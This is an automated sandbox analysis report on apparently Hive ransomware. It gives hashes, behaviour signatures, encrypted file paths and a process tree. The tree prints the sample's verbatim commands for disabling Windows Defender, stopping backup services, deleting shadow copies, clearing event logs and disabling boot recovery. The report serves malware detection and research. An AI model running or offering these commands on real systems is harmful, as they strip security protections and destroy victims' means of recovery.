Overview (score 10)

Tasks
Static (score 8)
211xahcou.exe, windows7-x64 (score 10)
211xahcou.exe, windows10-2004-x64 (score 10)
hive.exe, windows7-x64 (score 10)
hive.exe, windows10-2004-x64 (score 10)
sjl8j6ap3.exe, windows7-x64 (score 1)
sjl8j6ap3.exe, windows10-2004-x64 (score 1)
windows_25...c5.exe, windows7-x64 (score 10)
windows_25...c5.exe, windows10-2004-x64 (score 10)
zi1ysv64h.exe, windows7-x64 (score 10)
zi1ysv64h.exe, windows10-2004-x64 (score 10)

Resubmissions
23-12-2022 20:19, 221223-y39gvahb28 (score 10)
23-12-2022 19:54, 221223-ymz88scc8w (score 10)
23-12-2022 19:42, 221223-yerbcsha78 (score 10)

Analysis
max time kernel: 134s
max time network: 47s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 23-12-2022 19:42
Behavioral tasks
behavioral1: sample 211xahcou.exe, resource win7-20220812-en
behavioral2: sample 211xahcou.exe, resource win10v2004-20220901-en
behavioral3: sample hive.exe, resource win7-20221111-en
behavioral4: sample hive.exe, resource win10v2004-20220812-en
behavioral5: sample sjl8j6ap3.exe, resource win7-20220812-en
behavioral6: sample sjl8j6ap3.exe, resource win10v2004-20221111-en
behavioral7: sample windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe, resource win7-20221111-en
behavioral8: sample windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe, resource win10v2004-20220812-en
behavioral9: sample zi1ysv64h.exe, resource win7-20221111-en
General
Target: 211xahcou.exe
Size: 3.9MB
MD5: 0e4d44dde522c07d09d9e3086cfae803
SHA1: d8dc26e2094869a0da78ecb47494c931419302dc
SHA256: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512: ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP: 49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config

Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses mpcmdrun utility to delete all AV definitions.
  PID 1160 MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings
(signature name taken from the process tree below, where it is attached to the reg.exe adds listed here)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" (reg.exe)

Modifies security service (2 TTPs, 1 IoC)
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" (reg.exe)

Clears Windows event logs (1 TTP, 3 IoCs)
  PID 1648 wevtutil.exe
  PID 1652 wevtutil.exe
  PID 1480 wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  PID 1792 bcdedit.exe
  PID 1604 bcdedit.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
All 64 entries are "File opened for modification" events attributed to process 211xahcou.exe; only the paths are listed below. Most of the touched files carry an appended suffix of the form .mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_<tag>.cv2gj, while a minority (gadget .js/.css/.xml files, .png, .wmv, .ax, .reg, .mui) appear under their original names.
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCINFO.XML.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SCHOL_02.MID.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\settings.js
- C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png
- C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\DVD Maker\directshowtap.ax
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
- C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00642_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png
- C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css
- C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPreviewTemplate.html.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png
- C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png
- C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv
- C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png
- C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\css\currency.css
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44F.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Microsoft Games\Mahjong\de-DE\Mahjong.exe.mui.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Java\jre7\lib\zi\Europe\Monaco.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\gadget.xml
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0305493.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDBAR98.POC.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
- C:\Program Files (x86)\Common Files\System\msadc\handsafe.reg
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
- C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00957_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\gadget.xml
- C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0183290.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj
- C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml
- C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj
Launches sc.exe (8 IoCs)
Sc.exe is a Windows utility to control services on the system.
  PIDs 1716, 1432, 1940, 1992, 1420, 880, 1528, 1956 (all sc.exe)

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  PID 756 vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  PID 1812 powershell.exe
  PID 1768 powershell.exe
  PID 896 211xahcou.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Grouped by process; the original table lists one row per token enabled.
  wevtutil.exe (PIDs 1648, 1652, 1480), each: SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe (PID 944): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  wmic.exe (PID 1968): the same sequence of tokens as PID 944, logged twice; the second pass is cut off after token 33 by the 64-row display limit

Suspicious use of WriteProcessMemory (64 IoCs)
Each write below appears three times in the original table (the last one once, where the 64-row limit cuts the list off). Format: source PID and image, destination PID, report-internal target id.
  896 211xahcou.exe wrote to memory of 964 (target 26)
  964 net.exe wrote to memory of 1480 (target 28)
  896 211xahcou.exe wrote to memory of 840 (target 29)
  840 net.exe wrote to memory of 1392 (target 31)
  896 211xahcou.exe wrote to memory of 1152 (target 32)
  1152 net.exe wrote to memory of 1188 (target 34)
  896 211xahcou.exe wrote to memory of 1816 (target 35)
  1816 net.exe wrote to memory of 1768 (target 37)
  896 211xahcou.exe wrote to memory of 632 (target 38)
  632 net.exe wrote to memory of 776 (target 40)
  896 211xahcou.exe wrote to memory of 1692 (target 41)
  1692 net.exe wrote to memory of 336 (target 43)
  896 211xahcou.exe wrote to memory of 1100 (target 44)
  1100 net.exe wrote to memory of 1176 (target 46)
  896 211xahcou.exe wrote to memory of 1564 (target 47)
  1564 net.exe wrote to memory of 1948 (target 49)
  896 211xahcou.exe wrote to memory of 1432 (target 50)
  896 211xahcou.exe wrote to memory of 1940 (target 52)
  896 211xahcou.exe wrote to memory of 1992 (target 54)
  896 211xahcou.exe wrote to memory of 1420 (target 56)
  896 211xahcou.exe wrote to memory of 880 (target 58)
  896 211xahcou.exe wrote to memory of 1528 (target 60)
Processes
Process tree as recorded by the sandbox. The bracketed number is the nesting depth, followed by image path and PID, the command line, and the signatures attributed to that process.

[1] C:\Users\Admin\AppData\Local\Temp\211xahcou.exe (PID 896)
    cmd: "C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe (PID 964)
      cmd: net.exe stop "NetMsmqActivator" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1480)
        cmd: C:\Windows\system32\net1 stop "NetMsmqActivator" /y

  [2] C:\Windows\system32\net.exe (PID 840)
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1392)
        cmd: C:\Windows\system32\net1 stop "SamSs" /y

  [2] C:\Windows\system32\net.exe (PID 1152)
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1188)
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y

  [2] C:\Windows\system32\net.exe (PID 1816)
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1768)
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y

  [2] C:\Windows\system32\net.exe (PID 632)
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 776)
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y

  [2] C:\Windows\system32\net.exe (PID 1692)
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 336)
        cmd: C:\Windows\system32\net1 stop "VSS" /y

  [2] C:\Windows\system32\net.exe (PID 1100)
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1176)
        cmd: C:\Windows\system32\net1 stop "wbengine" /y

  [2] C:\Windows\system32\net.exe (PID 1564)
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1948)
        cmd: C:\Windows\system32\net1 stop "WebClient" /y

  [2] C:\Windows\system32\sc.exe (PID 1432)
      cmd: sc.exe config "NetMsmqActivator" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\sc.exe (PID 1940)
      cmd: sc.exe config "SamSs" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\sc.exe (PID 1992)
      cmd: sc.exe config "SDRSVC" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\sc.exe (PID 1420)
      cmd: sc.exe config "SstpSvc" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\sc.exe (PID 880)
      cmd: sc.exe config "UI0Detect" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\sc.exe (PID 1528)
      cmd: sc.exe config "VSS" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\sc.exe (PID 1956)
      cmd: sc.exe config "wbengine" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\sc.exe (PID 1716)
      cmd: sc.exe config "WebClient" start= disabled
      - Launches sc.exe

  [2] C:\Windows\system32\reg.exe (PID 1068)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

  [2] C:\Windows\system32\reg.exe (PID 860)
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

  [2] C:\Windows\system32\reg.exe (PID 1220)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

  [2] C:\Windows\system32\reg.exe (PID 816)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

  [2] C:\Windows\system32\reg.exe (PID 1756)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

  [2] C:\Windows\system32\reg.exe (PID 1704)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\system32\reg.exe (PID 1964)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\system32\reg.exe (PID 1196)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\system32\reg.exe (PID 836)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\system32\reg.exe (PID 1740)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\system32\reg.exe (PID 940)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

  [2] C:\Windows\system32\reg.exe (PID 808)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

  [2] C:\Windows\system32\reg.exe (PID 1276)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

  [2] C:\Windows\system32\reg.exe (PID 380)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

  [2] C:\Windows\system32\reg.exe (PID 1580)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

  [2] C:\Windows\system32\reg.exe (PID 512)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

  [2] C:\Windows\system32\schtasks.exe (PID 1376)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

  [2] C:\Windows\system32\schtasks.exe (PID 680)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

  [2] C:\Windows\system32\schtasks.exe (PID 1412)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

  [2] C:\Windows\system32\schtasks.exe (PID 1208)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

  [2] C:\Windows\system32\schtasks.exe (PID 1980)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

  [2] C:\Windows\system32\reg.exe (PID 684)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

  [2] C:\Windows\system32\reg.exe (PID 2032)
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

  [2] C:\Windows\system32\reg.exe (PID 276)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

  [2] C:\Windows\system32\reg.exe (PID 1116)
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

  [2] C:\Windows\system32\reg.exe (PID 1428)
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

  [2] C:\Windows\system32\reg.exe (PID 1728)
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

  [2] C:\Windows\system32\reg.exe (PID 728)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

  [2] C:\Windows\system32\reg.exe (PID 1708)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

  [2] C:\Windows\system32\reg.exe (PID 336)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

  [2] C:\Windows\system32\reg.exe (PID 1948)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

  [2] C:\Windows\system32\reg.exe (PID 916)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service

  [2] C:\Windows\system32\reg.exe (PID 1408)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

  [2] C:\Windows\system32\vssadmin.exe (PID 756)
      cmd: vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies

  [2] C:\Windows\system32\wevtutil.exe (PID 1648)
      cmd: wevtutil.exe cl system
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\wevtutil.exe (PID 1652)
      cmd: wevtutil.exe cl security
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\wevtutil.exe (PID 1480)
      cmd: wevtutil.exe cl application
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\Wbem\wmic.exe (PID 944)
      cmd: wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\Wbem\wmic.exe (PID 1968)
      cmd: wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\bcdedit.exe (PID 1792)
      cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit

  [2] C:\Windows\system32\bcdedit.exe (PID 1604)
      cmd: bcdedit.exe /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit

  [2] C:\Windows\system32\cmd.exe (PID 1300)
